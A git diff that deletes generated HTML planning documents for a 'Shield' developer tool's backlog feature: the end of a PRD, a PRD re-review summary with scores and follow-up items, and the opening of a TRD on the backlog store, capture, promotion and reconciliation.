-  dec --&gt; impl[&quot;/implement&quot;]
-  man --&gt; rec[&quot;Reconcile → remove from backlog:&lt;br/&gt;end of promoted /plan or /implement,&lt;br/&gt;or /backlog sweep (work now in plan.json)&quot;]
-  plan --&gt; rec
-  impl --&gt; rec
-  rec --&gt; bl
-</pre>
-<h2 id="6-goals--non-goals">6. Goals &amp; non-goals</h2>
-<h3 id="goals">Goals</h3>
-<ul>
-<li>Capture future work (epic / story / task granularity) at <strong>any point</strong> in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.</li>
-<li>Support <strong>both</strong> capture sources: user-created and agent-discovered.</li>
-<li>Keep the backlog <strong>ordered</strong> so there's a clear &quot;what to pick up next.&quot;</li>
-<li>Every entry is <strong>associated with a feature and an epic</strong> — existing or proposed-new — and the agent <strong>suggests a matching feature/epic</strong> at capture or promotion time.</li>
-<li>A <code>/backlog</code> command <strong>shows the current backlog</strong>, ordered, with each entry's feature + epic association, source, and <strong>pipeline status (research / prd / plan, read from <code>manifest.json</code>)</strong> — so you can see what's been started (e.g. a prd written) without the entry being removed.</li>
-<li>Provide a <strong>user-driven promotion path</strong>: the user picks an entry and starts the Shield step they judge appropriate (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>). The backlog suggests, but does not dictate, the next step.</li>
-<li><strong>Keep the backlog current</strong>: an entry promoted via <code>/plan</code> or <code>/implement</code> is removed at the end of that run; the <code>/backlog</code> view also sweeps out any entry whose work has since landed in a <code>plan.json</code>. The backlog reflects only not-yet-committed work.</li>
-<li><strong>Manual remove</strong>: any entry can be explicitly removed from <code>/backlog</code> — covers ideas decided against and entries not cleared by a promotion run.</li>
-</ul>
-<h3 id="non-goals">Non-goals</h3>
-<ul>
-<li><strong>Automatic end-of-task surfacing machinery</strong> (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.</li>
-<li><strong>Per-feature backlogs.</strong> v1 is a single global backlog.</li>
-<li><strong>A status/workflow engine.</strong> The lifecycle is minimal: an entry exists until it is removed — at the end of the <code>/plan</code> or <code>/implement</code> it was promoted from, by the <code>/backlog</code> sweep once its work is in a <code>plan.json</code>, or manually. No multi-state machine.</li>
-<li><strong>Syncing the backlog to the PM tool</strong> (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing <code>/pm-sync</code> on the resulting plan.</li>
-<li><strong>Replacing the PM tool's own backlog.</strong> This is Shield-local triage, not a project-management backlog of record.</li>
-</ul>
-<h2 id="7-success-metrics">7. Success metrics</h2>
-<table>
-<thead>
-<tr>
-<th>Metric</th>
-<th>Type</th>
-<th>Target</th>
-<th>Counter</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot</td>
-<td>Outcome</td>
-<td>≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; &lt;20% sit untouched &gt;60 days</td>
-<td>Entries pile up un-triaged → backlog becomes a graveyard</td>
-</tr>
-<tr>
-<td>Entries carrying a feature + epic association at promotion time</td>
-<td>Quality</td>
-<td>100% — promotion cannot complete without a feature and epic</td>
-<td>Forcing association makes capture so heavy nobody captures</td>
-</tr>
-<tr>
-<td>Agent feature/epic-suggestion acceptance</td>
-<td>Quality</td>
-<td>≥60% of agent feature/epic suggestions accepted without override</td>
-<td>Bad suggestions that users routinely override</td>
-</tr>
-<tr>
-<td>Capture friction</td>
-<td>Adoption</td>
-<td>Capture is a single <code>/backlog add</code> (or one agent action) and never blocks the current task</td>
-<td>Capture is so quick the backlog fills with low-signal noise</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Measurement (v1):</strong> no telemetry — metrics are tracked manually via a periodic <code>/backlog</code> audit and the git history of <code>backlog.json</code> (entry add/remove commits). Owner: @ashwinimanoj.</p>
-<h2 id="8-milestones">8. Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Exit criteria</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>A global <code>backlog.json</code> exists; entries can be added (user + agent) with order, source, and feature + epic association; <code>/backlog</code> shows the ordered list with per-entry pipeline status from <code>manifest.json</code></td>
-<td><code>backlog.json</code> schema defined; an entry can be captured from a skill or by the user; <code>/backlog</code> renders the ordered backlog with feature + epic and a research/prd/plan status read from <code>manifest.json</code>; an entry can be manually removed from <code>/backlog</code></td>
-<td>—</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic</td>
-<td>Capture prompts for a feature + epic; agent scans <code>manifest.json</code> features and known epics and proposes a match; user can accept, pick another, or create-new</td>
-<td>M1</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>The user picks an entry and starts the Shield step they choose (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>); once the entry's epic's work appears in the feature's <code>plan.json</code>, it is removed from the backlog</td>
-<td>Reconciliation uses <code>manifest.json</code> (find feature, has-plan?) + <code>plan.json</code> (epic present?) — no ids stamped; a <code>prd</code>-only feature is <strong>not</strong> removed; removal fires eagerly at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry and lazily on the <code>/backlog</code> sweep; the user-chosen step is never overridden</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<h2 id="9-open-questions">9. Open questions</h2>
-<h3 id="decided-locked-for-v1">Decided (locked for v1)</h3>
-<ul>
-<li><strong>Reconciliation triggers:</strong> an entry is removed (a) <strong>eagerly</strong> at the end of the <code>/plan</code> or <code>/implement</code> run it was promoted <em>from</em> — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) <strong>lazily</strong> by the <code>/backlog</code> view sweep, which prunes any entry whose epic's work is now in a <code>plan.json</code> (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into <code>plan.json</code>.</li>
-<li><strong>Reconciliation match key:</strong> feature (via <code>manifest.json</code>) + epic. Existing-epic entries match by <strong>epic id</strong>; proposed-new-epic entries match by <strong>epic name</strong> (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.</li>
-<li><strong>Ordering scheme:</strong> a single explicit integer <code>order</code> field per entry (like <code>orderindex</code>); no priority buckets in v1.</li>
-<li><strong>Entry granularity:</strong> entries carry a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>); promotion always yields ≥1 story regardless of <code>kind</code>.</li>
-<li><strong>Shippable work routes through <code>/plan</code>:</strong> anything that produces stories is promoted via <code>/plan</code> so it lands in <code>plan.json</code> (the lazy-sweep signal) and is pruned at the end of that <code>/plan</code> run. Direct <code>/implement</code> stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the <code>/implement</code> run too.</li>
-<li><strong>Manual remove:</strong> <code>/backlog</code> supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.</li>
-</ul>
-<h3 id="still-open">Still open</h3>
-<ul>
-<li><strong>Feature/epic discovery cost.</strong> Epics live inside per-feature <code>plan.json</code>, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged <code>plan.json</code> files; add a project-level epic index only if this gets slow.)</li>
-<li><strong>Dropped/rejected entries.</strong> Do we need an explicit terminal state for &quot;decided against,&quot; or is deleting the entry enough? (Deferred — see §11 Out of scope.)</li>
-</ul>
-<h2 id="10-risks--assumptions">10. Risks &amp; assumptions</h2>
-<h3 id="risks">Risks</h3>
-<table>
-<thead>
-<tr>
-<th>Risk</th>
-<th>Mitigation</th>
-<th>Owner</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog becomes a graveyard (captured, never acted on)</td>
-<td>Reconciliation prunes plan-committed work on <code>/backlog</code> view; periodic audit surfaces stale entries; §7 counter-metric tracks it</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Concurrent writes corrupt <code>backlog.json</code> (capture racing reconciliation)</td>
-<td>Atomic write (temp-then-rename); validate-or-refuse on read; <code>backlog.json</code> is git-tracked so corruption is revertable</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Reconciliation wrongly removes an entry (epic-name collision / ambiguous match)</td>
-<td>Match on feature + epic only; never remove on ambiguity (entry stays); <code>git revert</code> recovers any bad removal</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Capture friction too high → nobody captures</td>
-<td>Single-step capture; agent can capture without prompting</td>
-<td>@ashwinimanoj</td>
-</tr>
-</tbody>
-</table>
-<h3 id="assumptions">Assumptions</h3>
-<ul>
-<li><strong>(unvalidated)</strong> Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.</li>
-<li><strong>(unvalidated)</strong> The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own <code>backlog.json</code> history will validate it.</li>
-<li><strong>(assumed stable)</strong> Epic names in <code>plan.json</code> are stable enough to serve as the proposed-new-epic match key (see §9).</li>
-<li><strong>(validated)</strong> <code>manifest.json</code> is feature-keyed and <code>plan.json</code> carries <code>epics[].stories[]</code> — confirmed against the current schema.</li>
-</ul>
-<h2 id="11-out-of-scope--non-goals">11. Out of scope / Non-goals</h2>
-<ul>
-<li>Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).</li>
-<li><code>/pm-sync</code> of backlog entries to the PM tool before promotion.</li>
-<li>Cross-project / multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).</li>
-</ul>
-<hr />
-<blockquote>
-<p><strong>This is a lean PRD.</strong> It intentionally omits the following standard sections:</p>
-<ul>
-<li>Section 8 — User stories &amp; scenarios</li>
-<li>Section 9 — Functional requirements</li>
-<li>Section 10 — Non-functional requirements</li>
-<li>Section 11 — RBAC &amp; permissions matrix</li>
-<li>Section 12 — Dependencies</li>
-<li>Section 13 — Risks &amp; mitigations</li>
-<li>Section 14 — Assumptions</li>
-<li>Section 15 — Rollout plan (full — lean has its own §8 Milestones)</li>
-<li>Section 16 — Cost &amp; resource impact</li>
-<li>Section 17 — GTM &amp; customer-comms</li>
-<li>Section 18 — Support / CX impact</li>
-</ul>
-<p>If scope grows or stakeholders need more detail, run <code>/prd</code> again — Shield
-will offer to add specific sections or upgrade to <code>standard</code>.</p>
-</blockquote>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html
deleted file mode 100644
index 1cd1edb0..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html
+++ /dev/null
@@ -1,203 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict-ready-composite-31-0-p0s">Verdict: Ready (composite 3.1, 0 P0s)</a>
-<ul>
-<li><a href="#per-dimension-δ-vs-run-1">Per-dimension (Δ vs run 1)</a></li>
-</ul>
-</li>
-<li><a href="#no-p0s-remaining-items-all-non-blocking">No P0s. Remaining items (all non-blocking)</a>
-<ul>
-<li><a href="#p1-3">P1 (3)</a></li>
-<li><a href="#p2-4">P2 (4)</a></li>
-<li><a href="#tech-lead-nfr-notes-informational-lean-exempt--good-plantrd-inputs">Tech-lead NFR notes (informational, lean-exempt — good /plan/TRD inputs)</a></li>
-</ul>
-</li>
-<li><a href="#dx-consistency-check-the-reason-we-re-reviewed">DX consistency check (the reason we re-reviewed)</a>
-</li>
-<li><a href="#recommendation">Recommendation</a>
-</li>
-</ul>
-</nav>
-<h1 id="prd-review--shield-backlog-re-review">PRD Review — Shield Backlog (re-review)</h1>
-<p><strong>Source:</strong> <code>docs/shield/backlog-20260527/prd.md</code> (snapshot: <code>source-prd.md</code>)
-<strong>PRD type:</strong> Lean · <strong>Date:</strong> 2026-05-27 (run _2) · <strong>Reviewers:</strong> 13 dispatches
-<strong>Prior run:</strong> <code>reviews/prd/2026-05-27/</code> — Needs Work (2.7, 1 P0)</p>
-<h2 id="verdict-ready-composite-31-0-p0s">Verdict: <strong>Ready</strong> (composite 3.1, 0 P0s)</h2>
-<p>The P0 is cleared and the edits landed cleanly. Composite rose 2.7 → 3.1; the product-manager persona went C → B as the three flagged dims recovered. One residual contradiction from the rapid editing remains as a P1 (cheap fix), and the capture-from-skill interface is the main thing <code>/plan</code> will need to pin down.</p>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Weight</th>
-<th>Run 1</th>
-<th>Run 2</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>product-manager</td>
-<td>1.0</td>
-<td>C (2.17)</td>
-<td><strong>B (3.33)</strong></td>
-</tr>
-<tr>
-<td>agile-coach</td>
-<td>1.0</td>
-<td>B</td>
-<td><strong>B (3.0)</strong></td>
-</tr>
-<tr>
-<td>tech-lead</td>
-<td>1.0</td>
-<td>Informational</td>
-<td>Informational</td>
-</tr>
-<tr>
-<td>dx-engineer</td>
-<td>0.7</td>
-<td>B</td>
-<td><strong>B (3.0)</strong></td>
-</tr>
-<tr>
-<td>finops-analyst</td>
-<td>0.7</td>
-<td>N/A</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td><strong>Composite</strong></td>
-<td></td>
-<td><strong>2.69</strong></td>
-<td><strong>3.12</strong></td>
-</tr>
-<tr>
-<td><strong>P0s</strong></td>
-<td></td>
-<td>1</td>
-<td><strong>0</strong></td>
-</tr>
-</tbody>
-</table>
-<h3 id="per-dimension-δ-vs-run-1">Per-dimension (Δ vs run 1)</h3>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Run 1 → Run 2</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Problem clarity</td>
-<td>D → <strong>C</strong></td>
-</tr>
-<tr>
-<td>2</td>
-<td>Scope boundaries</td>
-<td>B → <strong>A</strong></td>
-</tr>
-<tr>
-<td>3</td>
-<td>Measurable success</td>
-<td>C → <strong>A</strong></td>
-</tr>
-<tr>
-<td>4</td>
-<td>Scenario coverage &amp; AC</td>
-<td>B → B</td>
-</tr>
-<tr>
-<td>7</td>
-<td>RACI &amp; approvals</td>
-<td>A → A</td>
-</tr>
-<tr>
-<td>11</td>
-<td>Why now</td>
-<td>C → C</td>
-</tr>
-<tr>
-<td>12</td>
-<td>Risks &amp; assumptions</td>
-<td><strong>D → A</strong> (P0 cleared)</td>
-</tr>
-<tr>
-<td>5,6,9,10,13</td>
-<td>(NFR/ops/GTM/CX/cost)</td>
-<td>informational/N/A (lean)</td>
-</tr>
-<tr>
-<td>8</td>
-<td>Legal/privacy</td>
-<td>N/A</td>
-</tr>
-</tbody>
-</table>
-<p><strong>What the fixes resolved:</strong> §10 Risks &amp; assumptions (risks+mitigations+owner, validated/unvalidated tags) cleared the P0 (12a F→A, 12b→A); numeric metric targets + measurement owner (3a/3d) lifted dim 3 C→A; the named persona (1a A) and the why-deferred/scope content lifted dims 1 and 2.</p>
-<hr />
-<h2 id="no-p0s-remaining-items-all-non-blocking">No P0s. Remaining items (all non-blocking)</h2>
-<h3 id="p1-3">P1 (3)</h3>
-<ul>
-<li><strong>P1-1 · §2 residual contradiction (DX).</strong> §2 Epic association still says the entry &quot;is removed <strong>only when</strong> this epic's work appears in <code>plan.json</code>&quot; — but we added a <strong>manual remove</strong> trigger (ideas decided against never hit a plan). Leftover from the earlier gate-only model. → Change &quot;only when&quot; to &quot;when&quot; or add &quot;(or removed manually)&quot;. <em>Cheap, and I introduced it — recommend fixing now.</em></li>
-<li><strong>P1-2 · Capture-from-skill interface undefined (DX).</strong> §5/§8 require capture &quot;usable from any Shield skill&quot; but no command/helper/write-contract is specified. → Define the capture entrypoint (this is the main <code>/plan</code>-level unknown).</li>
-<li><strong>P1-3 · Problem baseline still unquantified (1b, C; 11a/11b, C).</strong> Honestly logged as an unvalidated assumption rather than measured. Acceptable for v1, but a single real figure from past <code>/implement</code> transcripts would harden the &quot;why now.&quot;</li>
-</ul>
-<h3 id="p2-4">P2 (4)</h3>
-<ul>
-<li>§2/§5 eager-removal &quot;promotion reference&quot; mechanism is prose-only (how <code>/plan</code>/<code>/implement</code> receive + act on it). Pin in <code>/plan</code>/TRD.</li>
-<li>State that eager-prune and the <code>/backlog</code> sweep are <strong>idempotent</strong> (remove-if-present) so they can't double-remove or race.</li>
-<li>2c — no explicit scope-creep guard naming the likely creep ask + decision authority.</li>
-<li>7c — sign-off N/A names no confirmer; 3d — audit cadence vague (&quot;periodic&quot;).</li>
-</ul>
-<h3 id="tech-lead-nfr-notes-informational-lean-exempt--good-plantrd-inputs">Tech-lead NFR notes (informational, lean-exempt — good <code>/plan</code>/TRD inputs)</h3>
-<ul>
-<li><strong>Schema versioning (6e):</strong> add <code>schema_version</code> to <code>backlog.json</code> now + a migration policy — cheap at definition, expensive to retrofit.</li>
-<li><strong>Read-contract drift (6f):</strong> reconciliation should treat unrecognized <code>manifest.json</code>/<code>plan.json</code> shapes as &quot;doubt → entry stays,&quot; never crash/guess.</li>
-<li><strong>Perf budget (5a):</strong> state a <code>/backlog</code> sweep budget (e.g. &lt;1s up to ~50 features) to trigger the §9 &quot;add an index if slow&quot; decision.</li>
-<li><strong>Rollback (6c):</strong> name a one-line trigger — if eager prune wrongly removes and git-revert is costly, fall back to manual-remove-only.</li>
-</ul>
-<hr />
-<h2 id="dx-consistency-check-the-reason-we-re-reviewed">DX consistency check (the reason we re-reviewed)</h2>
-<p>The three-trigger removal model is now <strong>consistent across §5, §5-mermaid, §6, §8 M3, and §9</strong> — the earlier &quot;on <code>/backlog</code> view only&quot; wording is fully gone, and the proposed-new-epic match key + &quot;never remove on doubt&quot; invariant are stated consistently in §2/§9/§10. The <strong>only</strong> residual leftover is the §2 &quot;only when&quot; phrasing (P1-1).</p>
-<h2 id="recommendation">Recommendation</h2>
-<p><strong>Ready for <code>/plan</code>.</strong> Optionally fix P1-1 first (one-line, mine to fix) and decide the capture interface (P1-2) — though that one is legitimately <code>/plan</code>/TRD-level. The tech-lead schema-versioning + read-contract notes should be carried into the TRD.</p>
-<p><em>Files: <code>summary.md</code> · <code>enhanced-prd.md</code> · <code>review-comments.json</code> · <code>detailed/*.md</code> ×5.</em></p>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/trd.html b/docs/shield/backlog-20260527/outputs/trd.html
deleted file mode 100644
index 1aea5509..00000000
--- a/docs/shield/backlog-20260527/outputs/trd.html
+++ /dev/null
@@ -1,531 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>TRD — backlog-20260527</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#1-document-overview-document-overview">§1 Document Overview {#document-overview}</a>
-</li>
-<li><a href="#2-problem-statement-problem-statement">§2 Problem Statement {#problem-statement}</a>
-</li>
-<li><a href="#3-objective--scope-objective-scope">§3 Objective &amp; Scope {#objective-scope}</a>
-</li>
-<li><a href="#4-product-journey-product-journey">§4 Product Journey {#product-journey}</a>
-</li>
-<li><a href="#5-functional-requirements-functional-requirements">§5 Functional Requirements {#functional-requirements}</a>
-</li>
-<li><a href="#6-non-functional-requirements-non-functional-requirements">§6 Non-Functional Requirements {#non-functional-requirements}</a>
-</li>
-<li><a href="#7-high-level-design-high-level-design">§7 High-Level Design {#high-level-design}</a>
-</li>
-<li><a href="#8-alternatives-considered-alternatives-considered">§8 Alternatives Considered {#alternatives-considered}</a>
-</li>
-<li><a href="#9-cross-cutting-concerns-cross-cutting-concerns">§9 Cross-Cutting Concerns {#cross-cutting-concerns}</a>
-</li>
-<li><a href="#10-milestones-milestones">§10 Milestones {#milestones}</a>
-<ul>
-<li><a href="#m1--capture--store--view--no-deps">M1 — Capture + store + view  (no deps)</a></li>
-<li><a href="#m2--feature--epic-association--suggestion--deps-m1">M2 — Feature + epic association + suggestion  (deps M1)</a></li>
-<li><a href="#m3--promotion--reconciliation--deps-m2">M3 — Promotion + reconciliation  (deps M2)</a></li>
-</ul>
-</li>
-<li><a href="#11-apis-involved-apis-involved">§11 APIs Involved {#apis-involved}</a>
-<ul>
-<li><a href="#backlogjson-document-shape">backlog.json document shape</a></li>
-<li><a href="#backlog_store-write-helper-locked--plan-review-2026-05-27">backlog_store write helper (LOCKED — plan-review 2026-05-27)</a></li>
-<li><a href="#cli-surface-backlog">CLI surface (/backlog)</a></li>
-<li><a href="#manifestjson-read-contract-consumed-not-owned">manifest.json read-contract (consumed, not owned)</a></li>
-<li><a href="#reconciler-engine-entry-point">reconciler engine entry point</a></li>
-</ul>
-</li>
-<li><a href="#12-open-questions-open-questions">§12 Open Questions {#open-questions}</a>
-</li>
-<li><a href="#13-references-references">§13 References {#references}</a>
-</li>
-<li><a href="#14-rollback-strategy-rollback-strategy">§14 Rollback Strategy {#rollback-strategy}</a>
-</li>
-</ul>
-</nav>
-<!-- generated by /plan v2.21.0 on 2026-05-29 -->
-<h1 id="trd--shield-backlog">TRD — Shield Backlog</h1>
-<blockquote>
-<p><strong>In one line:</strong> a project-level &quot;later&quot; list (<code>docs/shield/backlog.json</code>) that
-captures future work from anywhere in the Shield workflow, shows it ordered with
-per-entry pipeline status, and prunes itself when that work lands in a plan — so
-ideas stop getting lost without becoming a graveyard.</p>
-</blockquote>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Project</td>
-<td>Shield</td>
-</tr>
-<tr>
-<td>Feature</td>
-<td><code>backlog-20260527</code></td>
-</tr>
-<tr>
-<td>Domain</td>
-<td>backend (Python)</td>
-</tr>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Linked PRD</td>
-<td><a href="../prd.md"><code>./prd.md</code></a> (reviewed <strong>Ready</strong>, composite 3.12)</td>
-</tr>
-<tr>
-<td>Linked plan</td>
-<td><a href="../plan.md"><code>./plan.md</code></a> · Sidecar: <a href="../plan.json"><code>./plan.json</code></a></td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-</tbody>
-</table>
-<h2 id="1-document-overview-document-overview">§1 Document Overview {#document-overview}</h2>
-<p>This TRD covers <strong>Shield Backlog v1</strong> — a single project-level store of future work,
-a <code>/backlog</code> command to view and curate it, a capture path callable by the user or by
-any Shield skill, a user-driven promotion path, and a reconciliation engine that prunes
-entries once their work commits to a plan. It is read by the Shield maintainer
-(@ashwinimanoj) and by any contributor implementing the <code>/backlog</code> command, the
-<code>backlog_store</code>, the <code>epic-suggester</code>, or the <code>reconciler</code>.</p>
-<p>It derives its problem framing, users, goals, and risks from the linked PRD
-(<a href="../prd.md"><code>./prd.md</code></a>, lean, reviewed Ready) and translates them into testable
-functional/non-functional requirements, a component design, and a ship plan. The
-execution breakdown (epics, stories, acceptance criteria) lives in
-<a href="../plan.md"><code>./plan.md</code></a> and its sidecar <a href="../plan.json"><code>./plan.json</code></a>; this document
-stays at the &quot;what fits where and why&quot; level — component-internal detail lives in the
-three LLD drafts (<a href="../lld-backlog-store.md"><code>./lld-backlog-store.md</code></a>,
-<a href="../lld-epic-suggester.md"><code>./lld-epic-suggester.md</code></a>,
-<a href="../lld-reconciler.md"><code>./lld-reconciler.md</code></a>).</p>
-<h2 id="2-problem-statement-problem-statement">§2 Problem Statement {#problem-statement}</h2>
-<p>Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) only acts on work that has
-<strong>already</strong> been decided on. There is no staging area <em>upstream</em> of it: <code>plan.json</code>
-holds only milestone-committed work, and <code>manifest.json</code> is an artifact index — neither
-models an un-triaged &quot;do this later&quot; item. The technical gap is therefore a missing
-<strong>ordered, project-level, persistent queue</strong> that any pipeline step (or the agent
-mid-task) can append to without derailing the current task, and that drains itself once
-an item's work reaches a plan.</p>
-<p>See PRD <a href="../prd.md">§3 Problem &amp; context</a> for the user-facing narrative (lost ideas,
-mid-<code>/implement</code> &quot;we should also handle X later&quot;, no consistent path from loose idea to
-planned stories). This section restates only the <em>engineering</em> shape of that gap: a
-capture-anywhere write surface + an ordered store + a removal gate keyed off existing
-Shield artifacts.</p>
-<h2 id="3-objective--scope-objective-scope">§3 Objective &amp; Scope {#objective-scope}</h2>
-<p>Deliver a global backlog store, a <code>/backlog</code> view/curate command, a
-user-and-agent capture path, a feature+epic association with agent suggestion, and a
-promotion+reconciliation loop that keeps the backlog reflecting only not-yet-committed
-work.</p>
-<p><strong>In scope</strong></p>
-<ul>
-<li>A single global store <code>docs/shield/backlog.json</code> with a versioned JSON Schema and a Python validator.</li>
-<li>A capture path: <code>/backlog add</code> (user) and a documented <code>capture()</code> write helper (skills/agent), atomic and validate-or-refuse.</li>
-<li><code>/backlog</code> view: ordered list, per-entry feature+epic+source, and pipeline-status badges read from <code>manifest.json</code>.</li>
-<li>Feature+epic association (either may be proposed-new) with exact-normalized agent suggestion.</li>
-<li>User-driven promotion (the user picks <code>/research</code>|<code>/prd</code>|<code>/plan</code>|<code>/implement</code>); a transient promotion reference.</li>
-<li>A reconciliation engine + eager prune, lazy sweep, manual remove, and a kill switch.</li>
-<li>An executable eval suite + version bump.</li>
-</ul>
-<p><strong>Out of scope</strong> (per PRD §6/§11)</p>
-<ul>
-<li>Hooks / automatic end-of-task surfacing machinery.</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>A status/workflow state machine; an audit trail for removed entries (manual remove is a plain delete in v1).</li>
-<li><code>/pm-sync</code> of backlog entries before promotion; cross-project/multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the <code>order</code> field; multi-writer locking (single-writer assumption — see §6 N1).</li>
-</ul>
-<h2 id="4-product-journey-product-journey">§4 Product Journey {#product-journey}</h2>
-<p><strong>Backend interpretation</strong> — the representative paths exercised by the change:</p>
-<ol>
-<li><strong>Capture (user).</strong> <code>/backlog add &quot;&lt;text&gt;&quot;</code> → <code>capture()</code> assigns a <code>uuid4</code> id and the
-next integer <code>order</code>, prompts for / accepts a feature + epic (proposed-new allowed),
-writes the full doc to <code>backlog.json.tmp</code>, then <code>os.replace()</code> → <code>backlog.json</code>.</li>
-<li><strong>Capture (agent).</strong> A Shield skill mid-task calls
-<code>capture(text, kind=…, feature=…, epic=…, source=&quot;agent&quot;)</code> and receives the entry id.
-Same atomic write; never blocks the current task.</li>
-<li><strong>View.</strong> <code>/backlog</code> reads <code>backlog.json</code> (validate-or-refuse), sorts by <code>order</code>, and
-for each entry looks up its feature in <code>manifest.json</code> to render
-<code>research ✓  prd ✓  plan –</code> style badges. A lazy reconciliation sweep runs over all
-entries (unless the kill switch is off) before rendering.</li>
-<li><strong>Promote.</strong> <code>/backlog promote &lt;id&gt;</code> launches the user-chosen Shield step and forwards
-<code>&lt;id&gt;</code> as a <strong>transient runtime reference</strong> (never stamped into <code>plan.json</code>).</li>
-<li><strong>Reconcile / prune.</strong> At the end of a promoted <code>/plan</code> or <code>/implement</code> run, if the run
-carried a promotion reference, the entry is pruned (eager). The <code>/backlog</code> view sweep is
